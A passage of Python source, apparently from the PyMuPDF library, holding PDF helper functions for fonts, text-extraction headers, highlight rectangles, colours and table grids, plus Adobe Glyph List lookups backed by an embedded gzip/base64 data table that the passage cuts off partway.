    if type(o) not in (list, tuple) or len(o) != 2:
        raise ValueError("morph must be a sequence of length 2")
    fixpoint, matrix = o
    if len(fixpoint) != 2 or len(matrix) != 6:
        raise ValueError("invalid morph parm 0")
    if matrix[4] != 0 or matrix[5] != 0:
        raise ValueError("invalid morph parm 1")
    return True
def CheckFont(page: "struct Page *", fontname: str) -> tuple:
    """Return the page font-list entry whose reference name (item 4)
    matches 'fontname', or None if absent."""
    for entry in page.get_fonts():
        if entry[4] == fontname:
            return entry
def CheckFontInfo(doc: "struct Document *", xref: int) -> list:
    """Return the font info stored in the document for 'xref', or None."""
    for info in doc.FontInfos:
        if info[0] == xref:
            return info
def UpdateFontInfo(doc: "struct Document *", info: typing.Sequence):
    """Insert or replace the document font info entry keyed by info[0]."""
    xref = info[0]
    for pos, item in enumerate(doc.FontInfos):
        if item[0] == xref:  # replace the first matching entry
            doc.FontInfos[pos] = info
            return
    doc.FontInfos.append(info)  # no match: append as new entry
def DUMMY(*args, **kw):
    """Do nothing; accepts any arguments and returns None."""
    return None
def planish_line(p1: point_like, p2: point_like) -> Matrix:
    """Compute a matrix mapping the line p1 -> p2 onto the x-axis.

    Args:
        p1, p2: point_like
    Returns:
        Matrix sending p1 to Point(0, 0) and p2 to a point on the x-axis
        at the same distance from Point(0, 0); combines a rotation with a
        translation.
    """
    return Matrix(util_hor_matrix(Point(p1), Point(p2)))
def image_profile(img: typing.ByteString) -> dict:
    """Return basic properties of an image.

    Args:
        img: bytes, bytearray, io.BytesIO object or an opened image file.
    Returns:
        A dictionary with keys width, height, colorspace.n, bpc, type, ext
        and size, where 'type' is the MuPDF image type (0 to 14) and 'ext'
        the suitable file extension.
    Raises:
        ValueError: if 'img' is none of the accepted kinds.
    """
    # isinstance (not exact-type check) also accepts subclasses
    if isinstance(img, io.BytesIO):
        stream = img.getvalue()
    elif hasattr(img, "read"):  # an opened (file-like) object
        stream = img.read()
    elif isinstance(img, (bytes, bytearray)):
        stream = img
    else:
        raise ValueError("bad argument 'img'")
    return TOOLS.image_profile(stream)
def ConversionHeader(i: str, filename: OptStr ="unknown"):
    # Return the leading boilerplate for a text-extraction output format.
    # 'i' selects the format ("html", "json", "xml", "xhtml"); any other
    # value yields plain text, i.e. an empty header. 'filename' is embedded
    # where the format records a document name (xml, json).
    t = i.lower()
    html = """<!DOCTYPE html>
<html>
<head>
<style>
body{background-color:gray}
div{position:relative;background-color:white;margin:1em auto}
p{position:absolute;margin:0}
img{position:absolute}
</style>
</head>
<body>\n"""
    xml = (
        """<?xml version="1.0"?>
<document name="%s">\n"""
        % filename
    )
    xhtml = """<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style>
body{background-color:gray}
div{background-color:white;margin:1em;padding:1em}
p{white-space:pre-wrap}
</style>
</head>
<body>\n"""
    text = ""
    json = '{"document": "%s", "pages": [\n' % filename
    # pick the header matching the requested format
    if t == "html":
        r = html
    elif t == "json":
        r = json
    elif t == "xml":
        r = xml
    elif t == "xhtml":
        r = xhtml
    else:
        r = text
    return r
def ConversionTrailer(i: str):
    """Return the closing boilerplate for a text-extraction output format.

    'i' selects the format ("html", "json", "xml", "xhtml"); any other
    value yields plain text, i.e. an empty trailer.
    """
    html = "</body>\n</html>\n"
    trailers = {
        "html": html,
        "json": "]\n}",
        "xml": "</document>\n",
        "xhtml": html,
    }
    return trailers.get(i.lower(), "")
class ElementPosition(object):
    """Attribute container for element position information.

    Attributes are attached dynamically; __str__ renders every set
    attribute as " name=repr(value)".
    """

    def __init__(self):
        pass

    def __str__(self):
        return "".join(f" {k}={v!r}" for k, v in self.__dict__.items())
def make_story_elpos():
    """Return a fresh, empty ElementPosition instance."""
    return ElementPosition()
def get_highlight_selection(page, start: point_like =None, stop: point_like =None, clip: rect_like =None) -> list:
    """Return rectangles of text lines between two points.

    Notes:
        The default of 'start' is top-left of 'clip'. The default of 'stop'
        is bottom-right of 'clip'.
    Args:
        start: start point_like
        stop: end point_like, must be 'below' start
        clip: consider this rect_like only, default is page rectangle
    Returns:
        List of line bbox intersections with the area established by the
        parameters.
    """
    # validate and normalize arguments
    if clip is None:
        clip = page.rect
    clip = Rect(clip)
    if start is None:
        start = clip.tl
    if stop is None:
        stop = clip.br
    # vertically restrict the clip to the start/stop points
    clip.y0 = start.y
    clip.y1 = stop.y
    if clip.is_empty or clip.is_infinite:
        return []
    # extract text of page, clip only, no images, expand ligatures
    blocks = page.get_text(
        "dict", flags=0, clip=clip,
    )["blocks"]
    lines = []  # will return this list of rectangles
    for b in blocks:
        bbox = Rect(b["bbox"])
        if bbox.is_infinite or bbox.is_empty:
            continue
        for line in b["lines"]:
            bbox = Rect(line["bbox"])
            if bbox.is_infinite or bbox.is_empty:
                continue
            lines.append(bbox)
    if lines == []:  # did not select anything
        return lines
    lines.sort(key=lambda bbox: bbox.y1)  # sort by vertical positions
    # cut off prefix from first line if start point is close to its top
    bboxf = lines.pop(0)
    if bboxf.y0 - start.y <= 0.1 * bboxf.height:  # close enough?
        r = Rect(start.x, bboxf.y0, bboxf.br)  # intersection rectangle
        if not (r.is_empty or r.is_infinite):
            lines.insert(0, r)  # insert again if not empty
    else:
        lines.insert(0, bboxf)  # insert again
    if lines == []:  # the list might have been emptied
        return lines
    # cut off suffix from last line if stop point is close to its bottom
    bboxl = lines.pop()
    if stop.y - bboxl.y1 <= 0.1 * bboxl.height:  # close enough?
        r = Rect(bboxl.tl, stop.x, bboxl.y1)  # intersection rectangle
        if not (r.is_empty or r.is_infinite):
            lines.append(r)  # append if not empty
    else:
        lines.append(bboxl)  # append again
    return lines
def annot_preprocess(page: "Page") -> int:
    """Prepare for annotation insertion on the page.

    Verifies the page is live and part of a PDF, then temporarily resets
    any page rotation to 0.

    Returns:
        The previous page rotation value (so callers can restore it).
    """
    CheckParent(page)
    if not page.parent.is_pdf:
        raise ValueError("is no PDF")
    previous_rotation = page.rotation
    if previous_rotation:
        page.set_rotation(0)
    return previous_rotation
def annot_postprocess(page: "Page", annot: "Annot") -> None:
    """Clean up after annotation insertion.

    Marks the annotation as Python-owned, links it (weakly) back to its
    page, and registers it in the page's annotation-reference dict.
    """
    annot.thisown = True
    annot.parent = weakref.proxy(page)
    page._annot_refs[id(annot)] = annot
def sRGB_to_rgb(srgb: int) -> tuple:
    """Convert an sRGB color code to an RGB color triple.

    There is **no error checking** for performance reasons!

    Args:
        srgb: (int) RRGGBB (red, green, blue), each color in range(255).
    Returns:
        Tuple (red, green, blue), each item in interval 0 <= item <= 255.
    """
    red, remainder = divmod(srgb, 1 << 16)
    green, blue = divmod(remainder, 1 << 8)
    return (red, green, blue)


def sRGB_to_pdf(srgb: int) -> tuple:
    """Convert an sRGB color code to a PDF color triple.

    There is **no error checking** for performance reasons!

    Args:
        srgb: (int) RRGGBB (red, green, blue), each color in range(255).
    Returns:
        Tuple (red, green, blue), each item in interval 0 <= item <= 1.
    """
    red, green, blue = sRGB_to_rgb(srgb)
    return red / 255.0, green / 255.0, blue / 255.0
def make_table(rect: rect_like =(0, 0, 1, 1), cols: int =1, rows: int =1) -> list:
    """Return a list of (rows x cols) equal sized rectangles.

    A utility to fill a given area with table cells of equal size.

    Args:
        rect: rect_like to use as the table area
        rows: number of rows
        cols: number of columns
    Returns:
        A list with <rows> items, where each item is a list of <cols>
        PyMuPDF Rect objects of equal sizes.
    """
    area = Rect(rect)  # ensure this is a Rect
    if area.is_empty or area.is_infinite:
        raise ValueError("rect must be finite and not empty")
    cell_width = area.width / cols
    cell_height = area.height / rows
    shift_right = (cell_width, 0, cell_width, 0)  # offset to next column
    shift_down = (0, cell_height, 0, cell_height)  # offset to next row

    # build the first row, cell by cell, left to right
    cell = Rect(area.tl, area.tl.x + cell_width, area.tl.y + cell_height)
    top_row = [cell]
    for _ in range(1, cols):
        cell += shift_right  # Rect '+' yields a new object
        top_row.append(cell)

    # every further row is the previous one shifted down by one cell height
    grid = [top_row]
    for _ in range(1, rows):
        grid.append([c + shift_down for c in grid[-1]])
    return grid
def repair_mono_font(page: "Page", font: "Font") -> None:
    """Repair character spacing for mono fonts.

    Notes:
        Some mono-spaced fonts are displayed with a too large character
        width, e.g. "a b c" instead of "abc". This utility adds an entry
        "/DW w" to the descendant font of 'font'. The int w is taken to be
        the first width > 0 of the font's unicodes, which should enforce
        viewers to use 'w' as the character width.
    Args:
        page: fitz.Page object.
        font: fitz.Font object.
    """
    def set_font_width(doc, xref, width):
        # Write "/DW width" into the descendant font and drop any "/W"
        # width array; returns False if 'xref' has no descendant fonts.
        df = doc.xref_get_key(xref, "DescendantFonts")
        if df[0] != "array":
            return False
        df_xref = int(df[1][1:-1].replace("0 R",""))
        W = doc.xref_get_key(df_xref, "W")
        if W[1] != "null":
            doc.xref_set_key(df_xref, "W", "null")
        doc.xref_set_key(df_xref, "DW", str(width))
        return True

    if not font.flags["mono"]:  # font not flagged as monospaced
        return None
    doc = page.parent  # the document
    # set comprehension: collect distinct xrefs referring to this font
    # (previously: list comprehension followed by a set() round-trip)
    xrefs = {
        f[0]
        for f in page.get_fonts()
        if (f[3] == font.name and f[4].startswith("F") and f[5].startswith("Identity"))
    }
    if not xrefs:  # our font does not occur
        return
    maxadv = max(font.glyph_advance(cp) for cp in font.valid_codepoints()[:3])
    width = round(maxadv * 1000)  # round() already returns an int
    for xref in xrefs:
        if not set_font_width(doc, xref, width):
            print("Cannot set width for '%s' in xref %i" % (font.name, xref))
# Adobe Glyph List functions
import base64, gzip
_adobe_glyphs = {}
_adobe_unicodes = {}
def unicode_to_glyph_name(ch: int) -> str:
    """Return the Adobe glyph name for unicode code point 'ch'.

    Lazily fills the module-level cache from the Adobe Glyph List data on
    first use; unknown code points map to ".notdef".
    """
    if not _adobe_glyphs:  # fill cache on first use ('== {}' was unidiomatic)
        for line in _get_glyph_text():
            if line.startswith("#"):  # comment line
                continue
            name, unc = line.split(";")
            # one glyph name may map to several code points
            for u in unc.split():
                _adobe_glyphs[int(u[:4], base=16)] = name
    return _adobe_glyphs.get(ch, ".notdef")
def glyph_name_to_unicode(name: str) -> int:
    """Return the unicode code point for Adobe glyph name 'name'.

    Lazily fills the module-level cache from the Adobe Glyph List data on
    first use; unknown names map to 65533 (the replacement character).
    """
    if not _adobe_unicodes:  # fill cache on first use ('== {}' was unidiomatic)
        for line in _get_glyph_text():
            if line.startswith("#"):  # comment line
                continue
            gname, unc = line.split(";")
            # only the first code point of a multi-value entry is kept
            _adobe_unicodes[gname] = int(unc[:4], base=16)
    return _adobe_unicodes.get(name, 65533)
def adobe_glyph_names() -> tuple:
    """Return all Adobe glyph names as a tuple.

    Fills the shared name-to-unicode cache on first use.
    """
    if not _adobe_unicodes:  # fill cache on first use ('== {}' was unidiomatic)
        for line in _get_glyph_text():
            if line.startswith("#"):  # comment line
                continue
            gname, unc = line.split(";")
            # int(s, 16) needs no "0x" prefix — simplified from int("0x"+s, 16)
            _adobe_unicodes[gname] = int(unc[:4], base=16)
    return tuple(_adobe_unicodes.keys())
def adobe_glyph_unicodes() -> tuple:
    """Return all Adobe glyph unicode values as a tuple.

    Fills the shared name-to-unicode cache on first use.
    """
    if not _adobe_unicodes:  # fill cache on first use ('== {}' was unidiomatic)
        for line in _get_glyph_text():
            if line.startswith("#"):  # comment line
                continue
            gname, unc = line.split(";")
            # int(s, 16) needs no "0x" prefix — simplified from int("0x"+s, 16)
            _adobe_unicodes[gname] = int(unc[:4], base=16)
    return tuple(_adobe_unicodes.values())
def _get_glyph_text() -> bytes:
return gzip.decompress(base64.b64decode(
b'H4sIABmRaF8C/7W9SZfjRpI1useviPP15utzqroJgBjYWhEkKGWVlKnOoapVO0YQEYSCJE'
b'IcMhT569+9Ppibg8xevHdeSpmEXfPBfDZ3N3f/t7u//r//k/zb3WJ4eTv2T9vzXTaZZH/N'
b'Junsbr4Z7ru7/7s9n1/+6z//8/X19T/WRP7jYdj/57//R/Jv8Pax2/Sn87G/v5z74XC3Pm'
b'zuLqfurj/cnYbL8aEzyH1/WB/f7h6H4/70l7vX/ry9G47wzK/hcr7bD5v+sX9YM4i/3K2P'
b'3d1Ld9z353O3uXs5Dl/7DT7O2/UZ/3Tw9zjsdsNrf3i6exgOm57eTsbbvjv/1w2xTnfDo5'
b'fnYdjA3eV0vjt25zXkRJB36/vhKwN+kEw4DOf+ofsLuP3pboewGISO7bAxPkUU+EaUD7t1'
b'v++O/3FTCESmcsILgQRuLhDs/w857lz6NsPDZd8dzmtfSP85HO8GcI53+/W5O/br3QkeJa'
b'9NERmPKgE2Ue+73vgj97Ded5TH1pPDEFCT4/35RFFtAMORMezXb3dwiioCsYe77rABjjCO'
b'jHs/nLs7mx3wuYFYX+HsEQyTfHg/DY/nVxa0rzmnl+6BVQfeegTyemSlOdjqczqJ0J9/ev'
b'fp7tOH1ed/zj+2d/j+9eOHf7xbtsu75jcw27vFh19/+/jux58+3/304edl+/HT3fz9kq3i'
b'w/vPH981Xz5/APR/5p/g9/+Qhb+/3bX/8+vH9tOnuw8f79798uvP7xAcwv84f//5XfvpL/'
b'D97v3i5y/Ld+9//Msdgrh7/+Hz3c/vfnn3GQ4/f/iLifja492HFbz+0n5c/ARg3rz7+d3n'
b'30ycq3ef3zO+FSKc3/06//j53eLLz/OPd79++fjrh0/tHRIHr8t3nxY/z9/90i7/AxIg1r'
b'v2H+37z3effpr//PPN1CIF47Q2LUSdNz+3NjakdvnuY7v4/BcEGb4WyEPI+DMT++nXdvEO'
b'n8iWFomaf/ztL8wZhPqp/e8vcAbm3XL+y/xHpPH/xlnDejXKHJTQ4svH9hdK/mF19+lL8+'
b'nzu89fPrd3P374sDSZ/qn9+I93i/bTD/D+8wcWxOruy6f2L4jl89xEjkCQaZ9+4Hfz5dM7'
b'k33v3n9uP3788uvndx/e/zu8/vThn8ggSDqH56XJ6Q/vTZKRVx8+/sZgmRemIP5y98+fWu'
b'Ao8vc+z+bMjE/Iu8Vn7RBxIis/q7TevW9//Pndj+37RWuz/AND+ue7T+2/o+zefaKTdzbq'
b'f84R7xeTdJYYJLOf7z4xq11N/osp2bt3q7v58h/vKLxzjtrw6Z2rOSbzFj+5rEd7+P84UL'
b'xH8/6vO/lj2/6Pu7eX7d3P6C3Y2tb3u+7ua3dkA/yvu+w/JqyV6GeUt0/dy7nb36MjySZ/'
b'MUMO3Hz5+LNycsdx54SB5wmN/XJvRh0z/vz1/PaCf4Zhd/rP9dPur/j7eDDtfIV+dX3+r7'
b'vz63B36vb9w7AbDn/ddLseown7kr7bbU4YIhD6/03//e7JiM0O669/vbyg1/hPdKLd8WGN'
b'PmnXoSs52h5200OGk/WW/fvdl0NvhpHTw3q3Pt59Xe8uCOARA8ydCcX433Z/rjfonfbrnf'
b'hP5j9MJtM0mbf4XZT4XT9czt0Pk3S1ALFfPxyHA6g2A3WCz90Pq6qFO+dsskjdtzAB3B+7'
b'rwwDeWi/reu0nbcOeMBostv1Dz9MpsuJwzbD+b5DcuGuKR32dFx/pcfGO9oOw7MZlAj64M'
b'/9bmOAaTJ/WFuJF0t898eHXfdDNmV4JC77x133J8XONCDiTTWq5JkvNMMLNY9C1ZLNa82R'
b'rIki9ULP50AZ/6pczOyn92DSE3IqRSZs7nc2+gmqKMi+O3an/sQkTQOpszcLsBTnsg2gSE'
b'f/KskTQ4YaANrFPFn4b/ELIEo/Iu2jQkbg/QEtEJXe1Y6MtWP3sl3/MMlnqf08D4cBaclr'
b'5KzEzHTuyXhZPyCXVhkcD0/DoXsmEwEfoWVQqsJ+Sg2eW9qniOGQFqHh3n+XCNMWCMLJ3b'
b'c4BPB2vz5CYenXkKjI06Rhu8mSJlSxKmmQX+uHB6g1jC0ztEQ+TRqdISmC6A46TLiH/sfM'
b'wBczE0mo4WrXHzoJpUyaKCvglLnpJC1XiEWSBN55eIHcDChLFpQ4TxZrHWkL2mUXwl6Yto'
b'N6OLefEmyRLHy7mizwDT1yt1szryqhfCOa1AJJBtKVZFRtCd8WU3pATvFrbr5cHlo6Dome'
b'tzoF0xmAbn3/vF2fgKgcbhbkKCCrCKBYETp0uZt+2siJ5pSGc92+kOVgbLVIOREE/rw+jc'
b'JfNGSxGWBysYMmOzxrCU3qelSBOUV1VQCf456kXEGaqB4gykGJUKTJQupBnixZ9NNk+S+2'
b'ihS/0kkCjOoD6ccjhCO3niVLKfYW367Y0xY90TIU6MwSVkRfVdMM6HFYsxzpPGobc0NLrV'
b'4ky6htQIoOA9rLmWTeIupuh6aRZaij5vPp2LH15zO49PmEMH1niBrcCCWd60KgH00/Bmgp'
b'kM8t9NzL/mm930scS/j7XYuHlr2MGiXkiwoDQvnESoFVyfKEarx1uSGFA7ehkULobywiRP'
b'BNiqgAcbOCo9MFRwtGp1GVn6wSDuzTImllwJ65b2mcAPyAjZxvfcTpHN+2xC0bZboApKt6'
b'joBDPZhbIgyyEeD7B7Sx9kZ1qTWqKgeUkvZ66MUI1N4eejGytzeG3kgUP/QumFyVWyD1+E'
b'pSja9NICVYYqbrSkvzJV2Xo0WhQfIedV+EsGU0rd23hAogyuUKtNZ7kBjOxTEPBT9LS/Cv'
b'BlfE32OqDgVzo+JFfWt3uqkhATv4OEhYCFtGXrRhR/jCY7Is4kuCVWavQ0QdiVoDqoiute'
b'kS9K0eFjpDy3E8nc75EdVjKGbtgVmg+1KkWtQAVp/hpaPQM1SNl1O/YwryWeEJUS3gUkeb'
b'wTnzDLP+DdtgG0jtClLrXh86SHu6mQoIb1r5HM1KWjmksEN7xQ9VsjVpEQ1ezvA7gUqMD+'
b'97RcpruAv3Le0G8V2Oww/ZBDpq+40xQxPBh2/G6D1BqRSiKq7YJ5TJKjTdJlnpDjptk1U0'
b'phVwrbvkabJy/S5Ut1UPnyELqgwIovM1Cm6jCoGgMDERdp6sJJ/K5EeKViU/Nqc/Lutj90'
b'OeYwD8UVS6Kb7RNzMrc/sZhqsZmYenfh3EnCc/StfWJj9KniAe0WFSKFE/hpxYWEK0k5TA'
b'wIh806Z72+hRd37UjZ50NJBBxu16o3UD+N1iHrjZ7LpRfab42+5KJ5gZH5eX8+WomxFq+Y'
b'++BBALJnWqVgGIRywArlFjJgefUXkgf/142NpPKQ84le/KfdtYs1kD2gjLDJ0mP7Hg6uSn'
b'tEb8P2TFYmW+p/xGo+B3kfK7SX7CQF4ZPE1++lUKGh3sT+tbAx3G5J/WN5WyDIzj5tQ/ae'
b'cZYrMDKqraT6b8fWshK2gxGcINBb+0hBQ8uuifpPuHY4SlmwhqwU+qg6frKFcRttbIphPQ'
b'R9WCwJesxfcF85bjZb9bX84siFWEiBYBh98kv1AF3jHTZ8k7PUvMVsm7v0F+TCjefdF4m7'
b'wTJWDpvmXIAeBbSrZI3on2gcBCFrWWCAN8BEhYRFXlK5N3elStQapRdRVIP8hQ0huaNirZ'
b'u6sBmN5NW8wn5kvaoqNFjZgn77qrpQeIFrXXInn3eFw/o62hZ8IU7Z2M0Qv3LREDiNQOJK'
b'vXQZEej8mQoT9th+NZO0TxyYCL+ukInW4UZFS14AO1SrX3Jnk36ByH4DIyMjMHO/jMzJfq'
b'MEsDhNLI0VCJyIAEUiopfEt7xzj2zk2XU9T0d9GQxPrzbdufT9GgMPWgrwuaWSZ/Y02eJ3'
b'+L5nZp8rdQ+VaWkPaJucrfok6uTv42mog1yd+ijEP4kpx58ndG2SR/V0NNkfz976E/WiZ/'
b'X99DZ3/uoxF+AtjV1Nx8q8JEqDd7qhkZYwUmB/byYoqG7OuuvwX63cnibJH8XQa0Gt8yoO'
b'UlKJ9v0JT/Ho9fZKuWgX7i7/FYPwUQLU2skr9vdTKh0/19q9UBhOgHI0gSjz0QU8+WUGx/'
b'jwoFJTAgF5SXemIhmYEhH066cZUEfEE2yc8syEXyM3s9aIU//4yuEtXlZ6815DN87+83Jq'
b'fh3OdavsR3yDVyJNdSS8STlByRjPISnlz/szJfgWNp8VoGUoZiqH8/969RViOG35kMcOJs'
b'RBqibJwnP0fZCI9+gol2Y79l3IBnya9F8gvza5n8oip+mfxihVqVUD7tt0yJVwRchW+TX0'
b'ImZckvekjEGPeLSjJ0nV+iejSdJr9EMkMGEQvfVHGMioqq/cuFhbVI3lPWNnlvynaevPdl'
b'Os2T974coS++D+WIye77IGJuibgc0dG8j8uRnqKkTA0tHsrkPSv4rnuk69kyeY+yEBW2Tt'
b'6bQmvwGxUa4tGFBv3ofZQBSNjwqnMI8UiOgOmXJJep+5Y5AQCTQ8vkA3NolXzARD8tMvxK'
b'qc+TD37AX+buWwIAACXpGM1y0I048Nbwi+C8ioAS+eBzH7J9YK7Bw8aPCTPIE8pgaglRG5'
b'YR4KsW6t2HmysAy1oz/LxzmWlUD8Vx8JLgCPXzKWgAH3T/jXRhfPKVrJgYUlSXBcigutDv'
b'rXxSsEROTCkjCMiMz1JUDQCnajBhkaqxAhD1zwXoPeodVNIPkQ7Skj6yUDBImU/J3LmllR'
b'BtZiHJ0IWlo6x0IfrsahmsVlVtHvWMEcFdKTzwLroNeugP8WICa2u8mMDA9t3T2iWOn7rb'
b'd1w/LmCKbejjcDnoalzNLX7uzzutF1ULh3v1BrV031vx8pkQwqZz3VrhQjV6CCNKFtuGJc'
b'J+CXy7FQn0rh9c3zxhZTbfMqVtHSDFTRe+D0CUduDXzrX6WJH2vUThvn0GM8sNoOYxU+9B'
b'4iuSX+EZWf+rFMw0+TU0X/B111iUya+R0rwCHaldcwA3p7hzeLXr2/ywCsMccRkI8fevR1'
b'3P8+RXnf9Qtn49Gac1P3QmkOOSg+//ZnLS5L9DEsrkv6OQwBT3afKR7rPkY6R7LkD7bmCa'
b'fPS9XVHjW8Ya5MXHEEsFIhpVyFb9RzoBqXOyNrRvkMU8kKIiFJAj1s4QiJqjgL0dmCdIRt'
b'jbKlcLknFrTJFEPRoVbfIxyhXwJVf8tw8E/ut0hJ0uLx2tXMBryuQTczFPPq24YzeZYHqP'
b'/hJU5qh0Sir31ITU1FM1qcJRufFXOiozVOV5JpTa+zO8mXdJnoncxM4YUpElI+VdlimozL'
b'ssycu8SxQaKC81OltQXuqS6cu81IUJxUtdVKS81MWSlJe6oJyZl7poQOXisiUlLlekxOWc'
b'lJe6YPqmIvWMlJe6pNRTL3XJtE+91IWhvNQlZZl6qUtKPfWylCyHqZelNPF5WUrmxFRkYe'
b'yFl6Wgv0JykPlZSA4yzwrJQaa9EFmQPmll/ls3EYqw3r/0vsvHAPTJN8XSf0ceSgdKS0BB'
b'qAaLzH7YvvITvb/51OsBtYVubaNDutDSa0vIXJTlGzX9jDU6kmtiaN/2WOU8GTmDt7gzhf'
b'jR+jzSF2+AVgT05AxBbB9iCIUVzdcQ+zZy0SB5236vlk6Rov7JrLTOUYD9nyIAqkHUa4A7'
b'PJ7Ha3DwLn0JXJwZlszn5slndhbT5POaSiyGgM92wQ6p+yzFCzQUHDLsc8j/mSVirR49/+'
b'e4/6WnKHfnhpZCWCSfow1iOL+5+Tunw1AEiL07n6KNW8i6dbv3NT7d0LbgJ/WxCRQp8ymD'
b'Lmlkh4SJqNWgXJIfzwyh4n/WvTemB5+jcoAIesERk97PUEgee6OwNwtDnXrW1npqiPPrQC'
b'Gr5POxg47h1WhiCDtKH5Sxz6d4Z7EB4gsY4b12O7XkD+brIFSafGFxF8kXmY7M3bfkBwA/'
b'uUCxfJHJRY5vKfa5JcJEotGA1INSoxID3aoUIWCl6aPufNEj9RSk0vQXgfQ+llXAJOYsYJ'
b'KCmcKU2cAkwC7WlMm5NtUpAihpoTxKk4e0MnuYuW9xC0Cr9JiefPGThJX99Gofpn9fRpME'
b'iqknCVB0v4wnCegqvkSThBZ0PElg9mpIZwTy7EpTgYxab6wgmGQIGvGX6zXS1oNK1a3oUj'
b'cRZKWo7Cwr2SacF55I2T8Jy+QM03p6298PO+nAcnEgi6lN6jG9ntqMwRuBTb2bwIuEkPkI'
b'0mhNnVI0/i/jheQJMd8ikR7MG9bcJdb9WBvga+MTlJGfv2MY+hLNJCoPSFWfJv9goy6Tf4'
b'T22ST/UHUHU5N/RBOFDHS02gEHrsdpwIuKCuFG2yd18g9JHHi+rmFK90+KUSX/9KLWWfLP'
b'INLCEjJSQ+5/qipSk1QjBKZq/1RJqOvkn77q15Pkn5GIiFNEqpL/oRh18j8h6mXyPzqmBU'
b'gd0zz5n2ikz+Ges5tZm/xPFA8ClXjq5DfGM0t+k6506b6lwRPQpY6x5bcgVWuJkCFl8luo'
b'sSljuOpuVsC06K2hpY+YJr9hHqA714bI5Va3h+B9hqLl/+aLP7efvktZQSi9wzEtQOu6Xo'
b'GOhkfonL9FuYYsklzDt68wFOByuu+fdAbNHXbLYGJB3q4/n3e6LkNREfiWrzr5F8tpnvwr'
b'Mq8qQfsRZ5aIGVa1dN8y/K8ASJE5whVZ2s4myb/sonPVmC9ReBztS2aWJf+KWmAF+ub2RE'
b'3GDa23BW7VGoi+7XRa5gTGO2qLlKiO0vi7Gafl3Ih0kfxLazqzafKvqGgRsxQtv/2uVFMk'
b'tEmEvrFe33cYbXZoTzM06bVvLC1Zm+4rnM0mxJ8uv6+P6zPczWtLH/eXZ65RzA1/v0Z3qc'
b'C8BXi8yML5JAf9dYD2QwU4RNq0Gncx5hGooqbre2Zlb87D7NfHZ121VxFXBYhhVScUyb8f'
b'Xob98Dj8kNN+ay2G2Ln7FkvnlQN0vqcO03ZLlcPEENs7igySfPBipgJRZAsZiZO6vJxYQl'
b'Q4TEXWNwyxC41qq+SlZoghdqXRyBB5pjlict0kvkZAczefJoKH/T2qelpZyFKT1FFDRLoS'
b'KJx3LtkMXCRBYzUABm0XwJQ+Qi7nyAG9pgzuZrN+VnWsIuTqKPJB6aFQ9G7OTfMAB70Rgu'
b'iMSw0ZlidBmxaBWh4WF5G73fNw7FDvcq7srrvgAZE89v2EO/g/QOzCkvVsmtL4aGrIdII+'
b'yFqqe7K2xs6enFlFwJHZxFrJeDK11p+ezOyevCdzu7ftyantXjxZ2A7Ok6XdhPdkZbfaPV'
b'nbzVpPzqwpnCPzibVj82RqzdY8mdmNAk/mdg3Uk1NrU+bJwhqLebK000xPVnYm4snaWgZ6'
b'cma3Wh05ndiJmCdTa9LsycxO/T2Z22m/J6fWLsaThR2kPVnaGbsnK2vw5snaGo94cmZtTB'
b'xZTKwxkidTayDrycxaH3kyt1aWnpxao1VPFtZaxJOlHeg9Wdk9fk/WdlPUkzO73ebIcmKn'
b'qJ5M7Ua0JzOrLnsyp8WNSFVOSYpUZeEarSMpVS4FWlKqXNJbUqpc0ltSqlxCrihVLiFXlK'
b'qQoCpKlUvyK+ZVLsmvmFe5JL8yUknyKyOVJL8yUknyKyOVJL8yUkn51kYqyY2aUuVSvjWl'
b'mkrya0o1FZlrSjWV5NeUairJrynVVJJfU6qpJL+mVFNJb02pppLeGaWaSnpnlGoq6Z0ZqS'
b'S9MyOVpHdmpJL0zoxUkt6ZkUrSOzNSSXpnlGomCZxRqsInEADJXEhTglMhKVVRCEmpilJI'
b'SlVUQlKqohaSUhUzISlVMReSUhWNkEYqn8A0NVL5FKWmdU9WQpZ2DuDJyppoerK2xjmORM'
b'ai8ovMJmMLCcpkbCnJNxlbBZIRVT75NbpNBFUJaUL26a2NVEub3gy5nE1cg8y5MDxx4mO4'
b'JWHLrqhyVs6ynAsJ4UvXrkGyVpTlRMicZCrklGQmZEEyF7IkORWyIlkIyYjKUsgZycqRU9'
b'aKsqyFNELOhKQYbnAhyZDdeEGSQWVeyCmLsswyIRlUlgvJBGZTIRlyVgjJBGalkExgJkKm'
b'TGAmQnKYLjMRksN0mc2FNFKJzJmRaiGkkWoppJGqFdJIJQnkMF3mEyEpVS7p5TBd5pJeDt'
b'NlLunlMF3mkl4O02Uu6eUwXeaSXg7TZS7p5TBd5pJeDtNlLunNjVSSXo6t5VSE5NhaTkVI'
b'jq3lVITk2FpORUiOreVUhGTrK6ciJOt5ORUh2dzKqUjFwbScilSFEUOkKowYUgqFEUNKoT'
b'BiSCkURgwphcKIIaXAwbQsJIEcTMtCEsjBtCwkgZURw+dkwZ6qnE+FZFBVKySDqkshGdSs'
b'FpIJnHsxClOfq5mQTFEtjk19nqVCMkXNXEgGtfRCFqYElz6fUQ+ohXrHJUuhaLyQJRNYLH'
b'yRoZ2DXE6EpONlKmRJMhOyIhn8MqjlVMgZSRGDWVcsSyFTkpWQGclayJzkTEgjlSShMlI1'
b'QhqpFkIaqZZCGqkkvZWRymd7ySG+aCW97EWLVtLLIb5oJb0c4otW0sshvmglvRzii1bSyy'
b'G+aCW9HOKLVtLL/rloJb0c4otW0jszUkl60T+vmiyQBUmf/Ap97KqZBpJc6UUrdm7FaiIk'
b'xVilQlKMlU9ghQ5q1Ug3UnGYKJqpkExvE7imIpVCMqJGxOAwUTS1kIyoqYRkehsvVc1hom'
b'gyIVkKTSokS6HJhaRUi+CYUi2CYyPGTEgjhq8bdW7i9XWjnpqIVkIyooWXasZONXN+yzRD'
b'B5WlTicHiSLLUjdBK9McXVCWujlXmRY04p9kCyGnJJdCFiRbR7LRYSh3jvO0NCOsczydcS'
b'qUUWa/kcHqqldniiRanAG57Y/rp/Vh/UPOk7jraNoPifuwMsL5Sa+XRiBU76bYnKrGR5UR'
b'dK9iNp5V1MbDeF2IXTpvUlnfMwwz0PSHRyA7h61ogQ4M/517jTZE990mAhcER7ZUTNKNlS'
b'aqVP14pWkagSoxdP28PuOvybd5Fsjtevf42m/O2x9WKy5ByDoAR5Fd9+i6THxJMqldgN6s'
b'n7rT1iwGvrJpWVdx6uvWgNv1/tvalFIIJB9xRh6ngW0WM4LHYsQZeawt24olwu/WyGyR1a'
